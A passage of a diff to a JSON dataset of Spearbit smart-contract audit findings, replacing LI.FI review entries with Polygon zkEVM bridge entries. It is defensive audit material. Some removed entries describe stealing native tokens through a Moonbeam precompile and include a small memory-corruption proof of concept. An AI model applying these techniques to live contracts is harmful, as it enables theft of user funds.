"https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different it is better to use the same format everywhere. If they would use the same value then the variables stored on that location could interfere with each other and the LiFi Diamond could start to behave unreliably. ... NAMESPACE = hex\"c7...\"; // keccak256(\"com.lifi.facets.axelar\") ... NAMESPACE = hex\"cf...\"; // keccak256(\"com.lifi.facets.ownership\"); ... NAMESPACE = hex\"a6...\"; ReentrancyGuard.sol: AxelarFacet.sol: OwnershipFacet.sol: PeripheryRegistryFacet.sol: ... NAMESPACE = hex\"dd...\"; // keccak256(\"com.lifi.facets.periphery_registry\"); ,! StargateFacet.sol: LibAccess.sol: ,! LibDiamond.sol: keccak256(\"com.lifi.library.access.management\") ... NAMESPACE = keccak256(\"com.lifi.facets.stargate\"); ... ACCESS_MANAGEMENT_POSITION = hex\"df...\"; // ... DIAMOND_STORAGE_POSITION = keccak256(\"diamond.standard.diamond.storage\");", + "title": "Abstract the way to calculate GlobalExitRoot", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because this will be enhanced when more L2s are added. 30 contract PolygonZkEVMGlobalExitRoot is ... { function updateExitRoot(bytes32 newRoot) external { ... bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) , ); // first ... } function getLastGlobalExitRoot() public view returns (bytes32) { return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); // second } } contract PolygonZkEVMBridge is ... { function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... { ... uint256 timestampGlobalExitRoot = globalExitRootManager .globalExitRootMap( keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot)) ); // third , ... } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Remove redundant Swapper.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are two versions of Swapper.sol (e.g Swapper.sol and SwapperV2.sol ) which are function- ally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from \"../Helpers/Swapper.sol\"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { }", + "title": "ETH honeypot on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network according to the documentation. This would make the bridge a large honey pot, even more than other bridges. If someone would be able to retrieve the ETH they could exchange it with all available other coins on the L2, bridge them back to mainnet, and thus steal about all TVL on the L2.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] - }, - { - "title": "Use additional checks for transferFrom()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts are not covering edge cases like non-standard ERC20 tokens that do not: revert on failed transfers. Some ERC20 implementations dont revert is the balance is insufficient but return false. Other functions transfer tokens with checking if the amount of tokens received is equal to the amount of tokens requested. This relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return ,! code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of ,! tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on amount of tokens ,! return code & } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } ,! }", + }, + { + "title": "Allowance is not required to burn wrapped tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The burn of tokens of the deployed TokenWrapped doesnt use up any allowance, because the Bridge has the right to burn the wrapped token. Normally a user would approve a certain amount of tokens and then do an action (e.g. bridgeAsset()). This could be seen as an extra safety precaution. So you lose the extra safety this way and it might be unexpected from the users point of view. However, its also very convenient to do a one-step bridge (comparable to using the permit). Note: most other bridges do it also this way. function burn(address account, uint256 value) external onlyBridge { _burn(account, value); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Move code to check amount of tokens transferred to library", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Facet.sol,OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. The following piece of code is present However it doesnt check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); }", + "title": "Messages are lost when delivered to EOA by claimMessage()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesnt contain a contract the low-level call still succeeds and delivers the ETH. The documen- tation says: \"... IBridgeMessageReceiver interface and such interface must be fullled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message.\" As we understood from the project this behavior is intentional. It can be useful to deliver ETH to Externally owned accounts (EOAs), however, the message (which is the main goal of the function) isnt interpreted and thus lost, without any notication. The loss of the delivery of the message to EOAs (e.g. non contracts) might not be obvious to the casual readers of the code/documentation. function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Fuse pools are not whitelisted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of pool is not checked. Be- cause of Fuse is permissionless framework, an attacker can create a fake pool, through this contract a user can be be tricked in the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {}", + "title": "Replace assembly of _getSelector() with Solidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _getSelector() gets the rst four bytes of a series of bytes and used assembly. This can also be implemented in Solidity, which is easier to read. function _getSelector(bytes memory _data) private pure returns (bytes4 sig) { assembly { sig := mload(add(_data, 32)) } } function _permit(..., bytes calldata permitData) ... { bytes4 sig = _getSelector(permitData); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Missing two-step transfer ownership pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Executor contract used for arbitrary cross-chain and same chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin which is a simple mechanism to transfer the ownership not supporting a two-steps transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation and transferring it to an inaccessible wallet or renouncing the owner- ship e.g. by mistake, can effectively lost functionality.", + "title": "Improvement suggestions for Verifier.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Verifier.sol is a contract automatically generated by snarkjs and is based on the template ver- ier_groth16.sol.ejs. There are some details that can be improved on this contract. However, changing it will require doing PRs for the Snarkjs project.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use low-level call only on contract addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user intention here will be to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. Otherwise, users can be under a wrong assumption that their cross-chain call was successful.", + "title": "Variable named incorrectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Seems like the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget as evidenced from the comment below: // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Functions which do not expect ether should be non-payable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "A function which doesnt expect ether should not be marked payable. swapAndStartBridgeTo- kensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the con- tract.", + "title": "Add additional comments to function forceBatch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function forceBatch() contains a comment about synch attacks. what is meant by that. The team explained the following: Its not immediately clear Getting the call data from an EOA is easy/cheap so no need to put the transactions in the event (which is expensive). Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node) and then its worth it to put the transactions in the event, which is easy to query. function forceBatch(...) ... { ... // In order to avoid synch attacks, if the msg.sender is not the origin // Add the transaction bytes in the event if (msg.sender == tx.origin) { emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, \"\"); } else { emit ForceBatch(lastForceBatch,lastGlobalExitRoot,msg.sender,transactions); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Incompatible contract used in the WormholeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been observed that all other faucets are using SwapperV2 contract. However, the WormholeFacet is still using Swapper contract. With the recent change on the SwapperV2, leftOvers can be send to specific receiver. With the using old contract, this capability will be lost in the related faucet. Also, LiFi Team claims that Swapper contract will be deprecated. ... import { Swapper } from \"../Helpers/Swapper.sol\"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ...", + "title": "Check against MAX_VERIFY_BATCHES", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "**In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES, otherwise, the MAX will never be reached. uint64 public constant MAX_VERIFY_BATCHES = 1000; function sequenceForceBatches(ForcedBatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ... ); ... } function sequenceBatches(BatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ...); ... } function verifyBatches(...) ... { ... require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ... ); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Solidity version bump to latest", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the review the newest version of solidity was released with the important bug fixes & Bug.", + "title": "Prepare for multiple aggregators/sequencers to improve availability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As long are there is one (trusted)sequencer and one (trusted)aggregator the availability risks are relatively high. However, the current code isnt optimized to support multiple trusted sequencers and multiple trusted aggregators. modifier onlyTrustedSequencer() { require(trustedSequencer == msg.sender, ... ); _; } modifier onlyTrustedAggregator() { require(trustedAggregator == msg.sender, ... ); _; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Bridge with AmarokFacet can fail due to hardcoded variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that Its set to 0 on the testnet. On the mainnet, these variables can be edited by Connext and AmarokFacet bridge operations can fail. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", + "title": "Temporary Fund freeze on using Multiple Rollups", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Claiming of Assets will freeze temporarily if multiple rollups are involved as shown below. The asset will be lost if the transfer is done between: a. Mainnet -> R1 -> R2 b. R1 -> R2 -> Mainnet 1. USDC is bridged from Mainnet to Rollover R1 with its metadata. 2. User claims this and a new Wrapped token is prepared using USDC token and its metadata. bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals); 3. Lets say the User bridge this token to Rollup R2. This will burn the wrapped token on R1 if (tokenInfo.originTokenAddress != address(0)) { // The token is a wrapped token from another network // Burn tokens TokenWrapped(token).burn(msg.sender, amount); originTokenAddress = tokenInfo.originTokenAddress; originNetwork = tokenInfo.originNetwork; } 4. The problem here is now while bridging the metadata was not set. 5. So once the user claims this on R2, wrapped token creation will fail since abi.decode on empty metadata will fail to retrieve name, symbol,... The asset will be temporarily lost since it was bridged properly but cannot be claimed Showing the transaction chain Mainnet bridgeAsset(usdc,R1,0xUser1, 100, ) Transfer 100 USDC to Mainnet M1 originTokenAddress=USDC originNetwork = Mainnet metadata = (USDC,USDC,6) Deposit node created R1 claimAsset(...,Mainnet,USDC,R1,0xUser1,100, metadata = (USDC,USDC,6)) Claim veried Marked claimed tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC tokenInfoToWrappedToken[Mainnet,USDC] created using metadata = (USDC,USDC,6) User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC] bridgeAsset(tokenInfoToWrappedToken[Mainnet,USDC],R2,0xUser2, 100, ) Burn 100 tokenInfoToWrappedToken[Mainnet,USDC] originTokenAddress=USDC originNetwork = Mainnet 36 metadata = \"\" Deposit node created with empty metadata R2 claimAsset(...,Mainnet,USDC,R2,0xUser2,100, metadata = \"\") Claim veried Marked claimed tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC Since metadata = \"\" , abi decode fails", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Store _dexs[i] into a temp variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The DexManagerFacet can store _dexs[i] into a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } } 43", + "title": "Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <. require( transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, \"PolygonZkEVM::forceBatch: Transactions bytes overflow\" ); require( currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, \"PolygonZkEVM::sequenceBatches: Transactions bytes overflow\" );", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Optimize array length in for loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In a for loop the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... }", + "title": "trustedAggregatorTimeout value may impact batchFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If trustedAggregatorTimeout and veryBatchTimeTarget are valued nearby then all batches veri- ed by 3rd party will be above target (totalBatchesAboveTarget) and this would impact batch fees. 1. Lets say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min. 2. Now anyone can call verifyBatches only after 31 min due to the below condition. 37 require( ); sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp, \"PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired\" 3. This means _updateBatchFee can at minimum be called after 31 min of sequencing by a nontrusted aggre- gator. 4. The below condition then always returns true. if ( // 31>30 ) { block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "StargateFacet can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "It might be cheaper to call getTokenFromPoolId in a constructor and store in immutable variables (especially because there are not that many pool, currently max 3 per chain pool-ids ) On the other hand, It requires an update of the facet when new pools are added though. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and lookup the poolid. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId e.g. the same asset is received on the destination chain. This seems a logical restriction. The advantage of not having to specify the poolids is that you abstract the interface from the caller and make the function calls more similar.", + "title": "Largest allowed batch fee multiplier is 1023 instead of 1024", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Per the setMultiplierBatchFee function, the largest allowed batch fee multiplier is 1023. /** * @notice Allow the admin to set a new multiplier batch fee * @param newMultiplierBatchFee multiplier bathc fee */ function setMultiplierBatchFee( uint16 newMultiplierBatchFee ) public onlyAdmin { require( newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024, \"PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range\" ); multiplierBatchFee = newMultiplierBatchFee; emit SetMultiplierBatchFee(newMultiplierBatchFee); } However, the comment mentioned that the largest allowed is 1024. // Batch fee multiplier with 3 decimals that goes from 1000 - 1024 uint16 public multiplierBatchFee;", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use block.chainid for chain ID verification in HopFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "HopFacet.sol uses user provided _hopData.fromChainId to identify current chain ID. Call to Hop Bridge will revert if it does not match block.chain, so this is still secure. However, as a gas optimization, this parameter can be removed from HopData struct, and its usage can be replaced by block.chainid.", + "title": "Deposit token associated Risk Awareness", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The deposited tokens locked in L1 could be at risk due to external conditions like the one shown below: 1. Assume there is a huge amount of token X being bridged to roll over. 2. Now mainnet will have a huge balance of token X. 3. Unfortunately due to a hack or LUNA like condition, the project owner takes a snapshot of the current token X balance for each user address and later all these addresses will be airdropped with a new token based on screenshot value. 4. In this case, token X in mainnet will be screenshot but at disbursal time the newly updated token will be airdropped to mainnet and not the user. 5. Now there is no emergencywithdraw method to get these airdropped funds out. 6. For the users, if they claim funds they still get token X which is worthless.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Rename event InvalidAmount(uint256) to ZeroAmount()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "event InvalidAmount(uint256) is emitted only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever emitted.", + "title": "Fees might get stuck when Aggregator is unable to verify", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The collected fees from Sequencer will be stuck in the contract if Aggregator is unable to verify the batch. In this case, Aggregator will not be paid and the batch transaction fee will get stuck in the contract", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use custom errors instead of strings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", + "title": "Consider using OpenZeppelins ECDSA library over ecrecover", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As stated here, ecrecover is vulnerable to a signature malleability attack. While the code in permit is not vulnerable since a nonce is used in the signed data, Id still recommend using OpenZeppelins ECDSA library, as it does the malleability safety check for you as well as the signer != address(0) check done on the next line.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization LibDiamond.sol#L56," + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use calldata over memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * .length). Using calldata directly, obliviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, its still more gass-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Some gas savings if function arguments are passed as calldata instead of memory.", + "title": "Risk of transactions not yet in Consolidated state on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There is are relatively long period for batches and thus transactions are to be between Trusted state and Consolidated state. Normally around 30 minutes but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that cant be undone, like transactions that have an effect outside of the L2, like off ramps, OTC transactions, alternative bridges, etc). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Avoid reading from storage when possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Functions, which can only be called by the contracts owner, can use msg.sender to read owners In all these cases below, ownership check is already done, so it is address after the ownership check is done. guaranteed that owner == msg.sender. LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead.", + "title": "Delay of bridging from L2 to L1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridge uses the Consolidated state while bridging from L2 to L1 and the user interface It can take between 15 min and 1 hour.\". Other (opti- public.zkevm-test.net, shows \"Waiting for validity proof. mistic) bridges use liquidity providers who take the risk and allow users to retrieve funds in a shorter amount of time (for a fee).", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Increment for loop variable in an unchecked block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "(This is only relevant if you are using the default solidity checked arithmetic). i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "title": "Missing Natspec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Some NatSpec comments are either missing or are incomplete. Missing NatSpec comment for pendingStateNum: /** * @notice Verify batches internal function * @param initNumBatch Batch which the aggregator starts the verification * @param finalNewBatch Last batch aggregator intends to verify * @param newLocalExitRoot * @param newStateRoot New State root once the batch is processed * @param proofA zk-snark input * @param proofB zk-snark input * @param proofC zk-snark input */ function _verifyBatches( New local exit root once the batch is processed uint64 pendingStateNum, uint64 initNumBatch, uint64 finalNewBatch, bytes32 newLocalExitRoot, bytes32 newStateRoot, uint256[2] calldata proofA, uint256[2][2] calldata proofB, uint256[2] calldata proofC ) internal { Missing NatSpec comment for pendingStateTimeout: /** * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed , * and avoid stack too deep errors. * @param admin Admin address * @param chainID L2 chainID * @param trustedSequencer Trusted sequencer address * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param trustedAggregator Trusted aggregator * @param trustedAggregatorTimeout Trusted aggregator timeout */ struct InitializePackedParameters { address admin; uint64 chainID; address trustedSequencer; uint64 pendingStateTimeout; bool forceBatchAllowed; address trustedAggregator; uint64 trustedAggregatorTimeout; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Executor should consider pre-deployed contract behaviors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different evm compatible chain would have different security assumption. Please refer to the Avax bug fix. Native-asset-call-deprecation Were the native asset call not deprecated, exploiters can bypass the check and triggers ERC20Proxy through the pre-deployed contract. Since the Avalanche team has deprecated the dangerous pre-deployed, the current Executor contract is not vulnerable. Moonbeams pre-deployed contract also has strange behaviors. Precompiles erc20 allows users transfer native token through ERC20 interface. Users can steal native tokens on the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount) One of the standard ethereum mainnet precompiles is \"Identity\" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC: 47 pragma solidity ^0.8.17; import \"hardhat/console.sol\"; contract Identity { function CorruptMem() public { uint dest = 128; uint data = dest + 1 ; uint len = 4; assembly { if iszero(call(gas(), 0x04, 0, add(data, 0x20), len, add(dest,0x20), len)) { invalid() } } } constructor() { string memory a = \"Test!\"; CorruptMem(); console.log(string(a)); // --> est!! } }", + "title": "_minDelay could be 0 without emergency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Normally min delay is only supposed to be 0 when in an emergency state. But this could be made to 0 even in nonemergency mode as shown below: 1. Proposer can propose an operation for changing _minDelay to 0 via updateDelay function. 2. Now, if this operation is executed by the executor then _minDelay will be 0 even without an emergency state. **", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Documentation improvements", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are a few issues in the documentation: HyphenFacets documentation describes a function no longer present. Link to DexManagerFacet in README.md is incorrect.", 